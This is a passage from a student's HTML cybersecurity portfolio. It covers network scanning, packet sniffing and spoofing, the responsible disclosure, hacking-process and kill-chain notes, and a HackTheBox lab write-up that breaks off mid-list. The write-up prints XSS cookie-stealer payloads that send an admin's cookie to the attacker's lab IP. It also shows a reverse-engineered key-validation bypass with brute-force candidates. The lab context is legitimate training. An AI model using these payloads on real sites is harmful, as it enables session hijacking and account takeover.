          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
